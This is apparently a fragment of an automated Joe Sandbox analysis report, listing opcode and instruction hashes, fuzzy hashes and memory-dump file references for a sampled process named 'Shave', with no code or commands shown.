                                                                                                                                • Opcode ID: 7e42df50dc8167ed08ae918246ec5fc59eec3bf38d8802005d2f3da263feb094
                                                                                                                                • Instruction ID: 8e758da71d317fc16fc8a9c9ae15ad404e7698026d35bd17f650278ad82ddeb3
                                                                                                                                • Opcode Fuzzy Hash: 7e42df50dc8167ed08ae918246ec5fc59eec3bf38d8802005d2f3da263feb094
                                                                                                                                • Instruction Fuzzy Hash: DE21F4B5D012199FCB10CFA9D584BDEFBF4EF49320F14806AE808AB251D774AA44CFA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a71e13efec69e80b49ca6504b33cb7ae222d7b33c796433afc9316a91e1eec30
                                                                                                                                • Instruction ID: ee8381ed65e34c9c57bbd127003378a66e6fe776890825c175e8de6eade4ef10
                                                                                                                                • Opcode Fuzzy Hash: a71e13efec69e80b49ca6504b33cb7ae222d7b33c796433afc9316a91e1eec30
                                                                                                                                • Instruction Fuzzy Hash: D8214B70E00249DFCB05CFA5D550AEDBFB6AF49305F248069E815BA2A4DB309985DF60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 95d8b83562b48f378f298b8c69138644ce440885900cc19df0b965693b8ccfa0
                                                                                                                                • Instruction ID: b85bd5d1d6de62fcd96120d81cf6e6fc8b8693ac76ed57d4147fc98d11f7f1df
                                                                                                                                • Opcode Fuzzy Hash: 95d8b83562b48f378f298b8c69138644ce440885900cc19df0b965693b8ccfa0
                                                                                                                                • Instruction Fuzzy Hash: A211BE7A340600CFD308DF28E594A46B7B6FF89B29B1084AAE149CB772CA34EC01CB10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6edc72b649c489901f1009e9d8eea73e1c0804d84497a2918e53f05b0384f538
                                                                                                                                • Instruction ID: c019d390a9c28b76ca318be2f4986fd2151110e40c8d6d04b509fb8895d12ef2
                                                                                                                                • Opcode Fuzzy Hash: 6edc72b649c489901f1009e9d8eea73e1c0804d84497a2918e53f05b0384f538
                                                                                                                                • Instruction Fuzzy Hash: 5F112C74E05209CFEB08EFA8D884ADDBBB5BF88705F94C165E805A7346DB30E945CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 874317d0124a90a56054c4665ba3732c98cddc91784bc063848240b2c5f83ee3
                                                                                                                                • Instruction ID: 9280d7e486b35f6060188fb9997b60c05f347d309f074d93531ab31d12ccd29a
                                                                                                                                • Opcode Fuzzy Hash: 874317d0124a90a56054c4665ba3732c98cddc91784bc063848240b2c5f83ee3
                                                                                                                                • Instruction Fuzzy Hash: 4611C135704511CFC7155B29C86852EBBB2BFC53523594079E81ACF7A0CF20CC4687D0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 90abe14a41b15da3a81be7a6b6779963ed8f95ba95be7b05a9c53fe92d2441f9
                                                                                                                                • Instruction ID: ad207e73911e0cd7c9ac7360a47000621f3e1b430b840d9aa8e764c952d93bc7
                                                                                                                                • Opcode Fuzzy Hash: 90abe14a41b15da3a81be7a6b6779963ed8f95ba95be7b05a9c53fe92d2441f9
                                                                                                                                • Instruction Fuzzy Hash: 2A1191B5F001118FCB50DF78D44469DBBF1FF88266B1001A9E94AE7720E731EA42CB92
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ae996dcdc38fa87a12e84de69bc884faf34f9f14a84bd4073973401c266e9cb5
                                                                                                                                • Instruction ID: d150699a3c73358786e5d0436f9a1906f63f1c3b3f8355884af0da9b61162cdf
                                                                                                                                • Opcode Fuzzy Hash: ae996dcdc38fa87a12e84de69bc884faf34f9f14a84bd4073973401c266e9cb5
                                                                                                                                • Instruction Fuzzy Hash: 79216FB0D00149DFDB05DFA9D54068EBFF2FF45300F1085A9C119AB265E7749A1ACF80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 724afcca367471be484e232739b3ace60e5b86f6d4e57ab7f2b381c184d2dd85
                                                                                                                                • Instruction ID: 98812df8b60bd15b270a12f130a58e53a812ba76387d241cbd76bfe4440f3f2d
                                                                                                                                • Opcode Fuzzy Hash: 724afcca367471be484e232739b3ace60e5b86f6d4e57ab7f2b381c184d2dd85
                                                                                                                                • Instruction Fuzzy Hash: C4117075E0021AEFCB18FFB8849059EBBB6AB88751B444139D519A7300DB319D42CBE1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b399ee20b294fe326243f98f0ee1250e25866b7982b5763b74efa77b1cc1a16c
                                                                                                                                • Instruction ID: 000ca463b67c6720c849d1fb32dfafa01637fe5da3d1735b9ac82e45ae272449
                                                                                                                                • Opcode Fuzzy Hash: b399ee20b294fe326243f98f0ee1250e25866b7982b5763b74efa77b1cc1a16c
                                                                                                                                • Instruction Fuzzy Hash: DE21E374D05249CFCB01EFB9D8445EDBFF0AF4A300F10526AD849B7220EB355A89CBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c81829268686eab197a32f5e43ee44b7d1fcd862d87a2caa8ac2bdcf79d4a68
                                                                                                                                • Instruction ID: 86c7f8de3fb9335beb6b97954bd1a7e0c574628b8d51ce7d44726c14e7616ccf
                                                                                                                                • Opcode Fuzzy Hash: 6c81829268686eab197a32f5e43ee44b7d1fcd862d87a2caa8ac2bdcf79d4a68
                                                                                                                                • Instruction Fuzzy Hash: E6117CB2800209EFDB10DF99C404BDEBFF5EF48320F108459E518A7251C379A550DFA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3d08a41f69086bf5e786b6308292d8d53354a76c46a13b78df95aa853d8731d1
                                                                                                                                • Instruction ID: ec5c96645c35b5b967eeb4e03f45d80216b93e6717de00d6d571c5f794dc08fc
                                                                                                                                • Opcode Fuzzy Hash: 3d08a41f69086bf5e786b6308292d8d53354a76c46a13b78df95aa853d8731d1
                                                                                                                                • Instruction Fuzzy Hash: 1711E834F001498FDB10DFACD854BDEBBB1AF49312F40D5A5E918A7385EA30EA428F51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2c471d0bf5d4e62a644252c1a7cc621b9e2a9cf193ffe10060e4ff717ee34abd
                                                                                                                                • Instruction ID: bd7687ea7aad28c1c49e89ee05a0e0ce7dc20c30cbd621c71e5bfaa235fa8ad0
                                                                                                                                • Opcode Fuzzy Hash: 2c471d0bf5d4e62a644252c1a7cc621b9e2a9cf193ffe10060e4ff717ee34abd
                                                                                                                                • Instruction Fuzzy Hash: C3118BB6800249EFDB10DFA9C804BDEBFF5EF48320F148859E518A7250C379A590DFA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2f5b15f6dec5b0d9cf7b6453e3fb12d67369ad65a3bb08ea7b715140d52a4325
                                                                                                                                • Instruction ID: 330d5a22aec1131714a191989bb2216f001ad925ed04ee389e917318bb2b3d4b
                                                                                                                                • Opcode Fuzzy Hash: 2f5b15f6dec5b0d9cf7b6453e3fb12d67369ad65a3bb08ea7b715140d52a4325
                                                                                                                                • Instruction Fuzzy Hash: F2113A74D00109DFDB05EFA9D940A9EBBF6FF84300F10C569D119AB265EB749A0ACF80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fa6c83c032fa03a95ce5fba600737edb792ea5f88ba9e7141a93a18ed7e3811e
                                                                                                                                • Instruction ID: 5026cd2a035a0ec8b7c476f028379ee1fee84a515588ae0de3a108e880dbf804
                                                                                                                                • Opcode Fuzzy Hash: fa6c83c032fa03a95ce5fba600737edb792ea5f88ba9e7141a93a18ed7e3811e
                                                                                                                                • Instruction Fuzzy Hash: 7B012B7560D3844FD7062734A8194AD3FEADBCB22171581A6E50ACF793DE258D4383A6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
                                                                                                                                • Instruction ID: aa864a3ae522808f2c87094be09c5eed03dc4ba5139dbb19e23f810937a4a8ad
                                                                                                                                • Opcode Fuzzy Hash: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
                                                                                                                                • Instruction Fuzzy Hash: 69016832704204AFCB068F649C217AE3BB7DFC9350B148066FD18DB290DB318E069B90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3d4e348a7683a97f7a8660e4a07a18db734656192c3163b49aeb019998df6fed
                                                                                                                                • Instruction ID: 3a986ef0b81fcf197b2e46460f626963b099d50560da856c8d298f1e0942359c
                                                                                                                                • Opcode Fuzzy Hash: 3d4e348a7683a97f7a8660e4a07a18db734656192c3163b49aeb019998df6fed
                                                                                                                                • Instruction Fuzzy Hash: 0C01F171E00209EFDB50AF68D8459EE3BB4FB88210F004225EC1AA7201D73449478BA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f9d95aa9e8f1fd40834c98309e50b9328f7c784932b9f3e4e5a20ba116034e5b
                                                                                                                                • Instruction ID: 9f68e689d67578d37a95c3af8940ee8b1c04800694ef4b6226d18f78e5b1d668
                                                                                                                                • Opcode Fuzzy Hash: f9d95aa9e8f1fd40834c98309e50b9328f7c784932b9f3e4e5a20ba116034e5b
                                                                                                                                • Instruction Fuzzy Hash: B1015E35E40219DFDB54AF78D8485AE7FB5FB88710F004539ED1AA7340DB3499528BA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d46f29f288a09cd48c54bff5a2bbc172dd92b24eaf644aec72b4adbd199e04e3
                                                                                                                                • Instruction ID: f4eabe932c2d9f230e35fb5b52d4b61c64a66ec45414ae02bb2eb6448cc513e4
                                                                                                                                • Opcode Fuzzy Hash: d46f29f288a09cd48c54bff5a2bbc172dd92b24eaf644aec72b4adbd199e04e3
                                                                                                                                • Instruction Fuzzy Hash: 81015A39340600CFD708EF29D588E56B7EAEF88B69F118479E1498B761CA74ED05CB20
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9bf7936c2657db3ed1d8464979d7549965ccacd495541adef3211ae63bd100f3
                                                                                                                                • Instruction ID: 85767c51e42a06318e195e9474e44c3855d53a02b9d8f34acbcd9ddf7adb60bb
                                                                                                                                • Opcode Fuzzy Hash: 9bf7936c2657db3ed1d8464979d7549965ccacd495541adef3211ae63bd100f3
                                                                                                                                • Instruction Fuzzy Hash: 5D1129B4D0428AEFDB02CFA8D8449AEBBF1FB4A305F504165D914A7350D7345A2ADFA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c7e2ad1a8e59533b925edc54b5b39f97fb3008275df810ff5924bfe7894858e
                                                                                                                                • Instruction ID: ab1b5d5c7f612037371c7b7cb6a59d0b688c1319dec072a213259373295c7fd8
                                                                                                                                • Opcode Fuzzy Hash: 3c7e2ad1a8e59533b925edc54b5b39f97fb3008275df810ff5924bfe7894858e
                                                                                                                                • Instruction Fuzzy Hash: 0AF09C31380610CB87155A2EE85462A76EEEFC8B56395417AED1DCF361DF21CC478791
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ce88ba0c5145fa0463a3e27aac28cc347685323984662deb00b269f0088a79c2
                                                                                                                                • Instruction ID: c3da780bc0655e25acba656cfc0db095f9f88068fc67396687b4693bf93dfc88
                                                                                                                                • Opcode Fuzzy Hash: ce88ba0c5145fa0463a3e27aac28cc347685323984662deb00b269f0088a79c2
                                                                                                                                • Instruction Fuzzy Hash: DAF02436B441109FC718BB2AF414A9FBBAAEFC5A24B04007AF5088B360DE36D802C794
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7a93eaa06724b2e79e7d42fa760fb6102d26a00547ee8a23c9d462bbf42d9a3b
                                                                                                                                • Instruction ID: a6aeb395219510355c1a1d427973b7e4b6ed559348264085b4deaea1cd380fa9
                                                                                                                                • Opcode Fuzzy Hash: 7a93eaa06724b2e79e7d42fa760fb6102d26a00547ee8a23c9d462bbf42d9a3b
                                                                                                                                • Instruction Fuzzy Hash: AC01BB70E00219DFCF44EFB9C9416EEBBF5BF48201F5485A6D91AF7250E73999018B91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 46aadbcae92aabe86b2cf53085e09b6b2cf2516aeed6acc0740d0aa2af85e396
                                                                                                                                • Instruction ID: bd952fd3bffb88dfd3085d4a147e2cad762847bc4bd173a05fc282aa7dffcf31
                                                                                                                                • Opcode Fuzzy Hash: 46aadbcae92aabe86b2cf53085e09b6b2cf2516aeed6acc0740d0aa2af85e396
                                                                                                                                • Instruction Fuzzy Hash: 91F06D75D002099F8F50DFAAD9419DFBBFAFF98350B004926D909A7215E7305E16C7A1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 864136088684827d294893b01f4440f0e0f0907802e5dbf0a2c767aaef21f083
                                                                                                                                • Instruction ID: cc90706ff538c0e6fbaca4c010f87b61acfb6ba7947c92e0a92013768918eb7f
                                                                                                                                • Opcode Fuzzy Hash: 864136088684827d294893b01f4440f0e0f0907802e5dbf0a2c767aaef21f083
                                                                                                                                • Instruction Fuzzy Hash: 3CF054353082448FD7049F29D915A267BE6AF89651B1544EAF90ACF2B2DA20DC05C791
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                                                                • Instruction ID: 0c3463949ee1ae525ac12f5af34df97a838c65e52c2bb33d2cf00fd7680a4862
                                                                                                                                • Opcode Fuzzy Hash: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                                                                • Instruction Fuzzy Hash: 0601D176608244DFCB159F64DC80B88BF71BF8A324F580296E9209B2E2C7308C14CB10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9a3b71d348041b17fe4ed0b2f604cf8a250006c5a88a8804b03956fd5a89c86b
                                                                                                                                • Instruction ID: cfb488a4726f236e0d9fde337f77e8490438791edf25783a04cd38e8925af762
                                                                                                                                • Opcode Fuzzy Hash: 9a3b71d348041b17fe4ed0b2f604cf8a250006c5a88a8804b03956fd5a89c86b
                                                                                                                                • Instruction Fuzzy Hash: C9F05E35340605DFD704DF5AD484C5ABBEAFF8C721765816AE60987330CB719C51CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 103ce7de5affa5086c6629e9297908ee242e2f568b3c198fea5dc8ed2f1fef05
                                                                                                                                • Instruction ID: 35e2e4cf9c0d250d1bab97af233adc697912a3c24e5961b642c101a5ee19e09c
                                                                                                                                • Opcode Fuzzy Hash: 103ce7de5affa5086c6629e9297908ee242e2f568b3c198fea5dc8ed2f1fef05
                                                                                                                                • Instruction Fuzzy Hash: D6F01C353401148FD708AF2AD958A2B77EAFFC879171584A9F90ACB7B1DE60EC01C790
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 87ae6cd3685e88ccef122826c12ec8a64028246a70ff76a84e8ca212f7d44df3
                                                                                                                                • Instruction ID: 6f5d6c9342333d1151b57bf2bf3c4788a1c6e9ae60a8e24decda28d93eee7239
                                                                                                                                • Opcode Fuzzy Hash: 87ae6cd3685e88ccef122826c12ec8a64028246a70ff76a84e8ca212f7d44df3
                                                                                                                                • Instruction Fuzzy Hash: AEE08C3405C3814ECB07AB71A8948887F7AAF4224472442B5D00A8B5BBDFB8099BCB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2db57f94c1a11846ba630e2626c5793562846ae42eb2105db4cdafdbcb440977
                                                                                                                                • Instruction ID: e07f69eb9864daab4bc7e152dae6a04e1e42d7d8ab62cf44b6f8a855657936cc
                                                                                                                                • Opcode Fuzzy Hash: 2db57f94c1a11846ba630e2626c5793562846ae42eb2105db4cdafdbcb440977
                                                                                                                                • Instruction Fuzzy Hash: 60E0EC36A00108DFDF05CF59E844AEDB7B2EB98326F11C066EA198B214D7358A65DB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e0144619a2f18fc8dcc6a43326a89382817eadef7f219a50aa74142c8a069217
                                                                                                                                • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                                                                • Opcode Fuzzy Hash: e0144619a2f18fc8dcc6a43326a89382817eadef7f219a50aa74142c8a069217
                                                                                                                                • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a0c2444e7937dcf68cc2cf49c1f96735fbdf2d79cd0f1545bdcff07ecaa6e1a6
                                                                                                                                • Instruction ID: 0dcaa56a6b9ae0b1ae8250c45c7b4ba9138ea1eaccea4ca4b2291f22a962c110
                                                                                                                                • Opcode Fuzzy Hash: a0c2444e7937dcf68cc2cf49c1f96735fbdf2d79cd0f1545bdcff07ecaa6e1a6
                                                                                                                                • Instruction Fuzzy Hash: 74D05B35D6022BD6CB11EBA1ED100EDB334EED5265B548617D53C37150EB34265EC6A1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                • Instruction ID: 7664a699ddf78696b84bb1121c3968f2adab32b7b61b11eb126afe8992ed5369
                                                                                                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                • Instruction Fuzzy Hash: 64C0803310C1246A9234104E7C40DA3774DC3C53B5A210137FD3CE7200DC425C8401F4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b6bcf6a8fc5b5cc97763b6c6cf357d7e0955c44ec9f118e41d4415dcd461ad97
                                                                                                                                • Instruction ID: 594ff4d8e29414667ccc8e0f54b426dea6fc16679759ead267b7c67f9fe4a1c1
